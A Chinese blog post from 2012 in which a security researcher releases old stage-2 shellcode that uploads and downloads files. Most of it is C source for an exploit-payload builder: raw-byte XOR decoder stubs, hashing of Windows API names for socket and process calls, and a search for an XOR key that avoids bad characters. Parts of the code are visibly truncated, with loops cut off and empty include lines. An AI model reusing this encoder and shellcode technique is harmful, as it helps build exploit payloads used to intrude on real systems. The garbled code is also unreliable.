2012年(272)
分类: 服务器与存储
2012-06-26 13:17:21
由于个人职业发展的原因,以后可能不会再深入研究这方面的东西了,只会当作纯粹的兴趣爱好。
我最近都在研究WEB和浏览器安全,以及安全设计方面的工作。所以为了让这些烂在我硬盘里的东西能够更好的发挥作用,能够更加的open,我决定公开这些已经烂掉的东西,也算是对自己过去的一个交代。
shellcode是一项非常具有艺术性的工作,可以对shellcode做加密,可以自己在shellcode里实现 一个协议,可以直接执行一个PE文件,如果是IE里的,可以对抗主动防御,可以通用不挂浏览器,文件型的功能就更多了。
躺在我硬盘里的shellcode太多了,很多我也忘记了原本的功能,也忘记了哪段代码有没有bug,哪段是最新的。如果贴错代码了,就当是POC吧
这里我贴一个简单的上传文件和下载文件的shellcode,如果以前有朋友用过我写的exploit,应该使用过这个功能,在shell里直接可以上传和下载文件。
这段shellcode是一个stage2的shellcode。这种思想是分段发送shellcode,先发送stage1 的shellcode,然后stage1的shellcode会接收stage2 的shellcode去执行。一般来说stage1 的shellcode会短小精悍,stage2 的shellcode则会比较强大。下面的shellcode是stage 2 shellcode的演示.
PS:我以后不会再公开任何漏洞利用的exploit了。
最后,再次向shellcoder们致敬。欢迎和我一起讨论任何技术问题。
/*
author: axis@ph4nt0m.org
Team: Ph4nt0m Security Team ()
Date: 2007
*/
#include
#include
#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm
_emit 0x90\
__asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN
#define Xor_key 0x33;
unsigned char sh_Buff[2048];
unsigned int sh_Len;
unsigned int Enc_key=0x99;
unsigned char decode1[] =
/*
00401004 . /EB 0E
JMP SHORT encode.00401014
00401006 $
|5B POP EBX
00401007 .
|4B DEC EBX
00401008 .
|33C9 XOR ECX,ECX
0040100A . |B1 FF
MOV CL,0FF
0040100C > |80340B 99 XOR BYTE PTR
DS:[EBX+ECX],99
00401010 .^|E2 FA
LOOPD SHORT encode.0040100C
00401012 . |EB 05
JMP SHORT encode.00401019
00401014 > \E8 EDFFFFFF CALL encode.00401006
*/
"\xEB\x0E\x5B\x4B\x33\xC9\xB1"
"\xFF" //
shellcode size
"\x80\x34\x0B"
"\x99" // xor
byte
"\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";
unsigned
char decode2[] =
/* ripped from eyas
00406030 /EB
10 JMP SHORT
00406042
00406032
|5B
POP EBX
00406033
|4B
DEC EBX
00406034
|33C9 XOR
ECX,ECX
00406036 |66:B9 6601 MOV CX,166
0040603A |80340B 99 XOR BYTE
PTR DS:[EBX+ECX],99
0040603E ^|E2 FA
LOOPD SHORT 0040603A
00406040 |EB
05 JMP SHORT
00406047
00406042 \E8 EBFFFFFF CALL 00406032
*/
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9"
"\x66\x01" // shellcode size
"\x80\x34\x0B"
"\x99" // xor byte
"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF";
// kernel32.dll functions index
#define
_LoadLibraryA 0x00
#define _CreateProcessA 0x04
#define _TerminateProcess 0x08
//#define
_ExitThread
0x08
#define _CreatePipe
0x0C
#define _CreateNamedPipeA 0x10
#define
_CloseHandle
0x14
#define
_CreateEventA 0x18
#define _WaitForMultipleObjects 0x1C
#define _GetOverlappedResult 0x20
#define
_CreateFileA
0x24
#define _ReadFile
0x28
#define
_WriteFile
0x2C
#define _WaitForSingleObjectEx 0x30
#define
_Sleep
0x34
// ws2_32.dll functions index
#define
_WSAStartup
0x38
#define
_WSASocketA
0x3C
#define
_setsockopt
0x40
#define
_bind
0x44
#define
_listen
0x48
#define
_accept
0x4C
#define
_recv
0x50
#define
_send
0x54
#define _WSACreateEvent 0x58
#define _WSAEventSelect 0x5C
#define _WSAEnumNetworkEvents 0x60
#define
_ioctlsocket
0x64
#define
_closesocket
0x68
// data index
#define
_lsck
0x6C
#define
_hsck
0x70 // socket handle
#define
_hin0
0x74 // transferring data to subprocess. incoming handler
#define
_hin1
0x78 // outgoing
#define
_hout0
0x7C // Create named pipe and open it. incoming handler
#define
_hout1
0x80 // outgoing
#define
_pi0
0x84
#define
_pi1
0x88
#define
_epip
0x8C
#define
_esck
0x90
#define
_flg
0x94
#define
_lap
0x98
#define
_cnt
0xAC
#define
_pbuf
0xB0
#define
_sbuf
0xF0
// functions number
#define
_Knums
14
#define
_Wnums
13
// Need functions
unsigned char functions[100][128] =
{
// kernel32
{"LoadLibraryA"},
{"CreateProcessA"},
{"TerminateProcess"},
// {"ExitThread"},
{"CreatePipe"},
{"CreateNamedPipeA"},
{"CloseHandle"},
{"CreateEventA"},
{"WaitForMultipleObjects"},
{"GetOverlappedResult"},
{"CreateFileA"},
{"ReadFile"},
{"WriteFile"},
{"WaitForSingleObjectEx"},
{"Sleep"},
// ws2_32
{"WSAStartup"},
{"WSASocketA"},
{"setsockopt"},
{"bind"},
{"listen"},
{"accept"},
{"recv"},
{"send"},
{"WSACreateEvent"},
{"WSAEventSelect"},
{"WSAEnumNetworkEvents"},
{"ioctlsocket"},
{"closesocket"},
// data
{""},
};
void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();
// Get function hash
unsigned long hash(unsigned char *c)
{
unsigned long h=0;
while(*c)
{
h = ( ( h << 25 ) | ( h
>> 7 ) ) + *c++;
}
return h;
}
// get shellcode
void GetShellCode()
{
char
*fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char *pSc_addr;
unsigned char pSc_Buff[2048];
unsigned int MAX_Sc_Len=0x2000;
unsigned long dwHash[100];
unsigned int dwHashSize;
int l,i,j,k;
// Get functions hash
for (i=0;;i++) {
if (functions[i][0] == '\x0') break;
dwHash[i] = hash(functions[i]);
//fprintf(stderr,
"%.8X\t%s\n", dwHash[i], functions[i]);
}
dwHashSize = i*4;
// Deal with shellcode
pSc_addr = (unsigned char *)ShellCode;
for (k=0;k
break;
}
}
pSc_addr+=(k+8); // start of the ShellCode
for (k=0;k
break;
}
}
sh_Len=k; // length of the ShellCode
memcpy(pSc_Buff, pSc_addr, sh_Len);
// Add functions hash
memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash,
dwHashSize);
sh_Len += dwHashSize;
//printf("%d bytes shellcode\n", sh_Len);
// print shellcode
//PrintSc(pSc_Buff, sh_Len);
// find xor byte
for(i=0xff; i>0; i--)
{
l = 0;
for(j=0; j
if (
//
((pSc_Buff[j] ^ i) == 0x26) || //%
//
((pSc_Buff[j] ^ i) == 0x3d) || //=
//
((pSc_Buff[j] ^ i) == 0x3f) || //?
//
((pSc_Buff[j] ^ i) == 0x40) || //@
((pSc_Buff[j] ^ i) == 0x00) //||
//
((pSc_Buff[j] ^ i) == 0x0D) ||
//
((pSc_Buff[j] ^ i) == 0x0A) ||
//
((pSc_Buff[j] ^ i) == 0x5C)
)
{
l++;
break;
};
}
if (l==0)
{
Enc_key = i;
//printf("Find XOR Byte: 0x%02X\n", i);
for(j=0;
j
pSc_Buff[j] ^= Enc_key;
}
break;
// break when found xor byte
}
}
// No xor byte found
if (l!=0){
//fprintf(stderr, "No xor byte
found!\n");
sh_Len = 0;
}
else {
//fprintf(stderr, "Xor byte
0x%02X\n", Enc_key);
// encode
if (sh_Len > 0xFF) {
*(unsigned
short *)&decode2[8] = sh_Len;
*(unsigned
char *)&decode2[13] = Enc_key;
memcpy(sh_Buff, decode2, sizeof(decode2)-1);
memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
sh_Len +=
sizeof(decode2)-1;
}
else {
*(unsigned
char *)&decode1[7] = sh_Len;
*(unsigned
char *)&decode1[11] = Enc_key;
memcpy(sh_Buff, decode1, sizeof(decode1)-1);
memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
sh_Len +=
sizeof(decode1)-1;
}
}
}
// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
int i,j;
char *p;
char msg[4];
printf("/* %d bytes */\n",buffsize);
for(i=0;i
if((i%16)==0)
if(i!=0)
printf("\"\n\"");
else
printf("\"");
sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
for( p = msg, j=0; j < 4; p++,
j++ )
{
if(isupper(*p))
printf("%c", _tolower(*p));
else
printf("%c", p[0]);
}
}
printf( "\";\n");
}
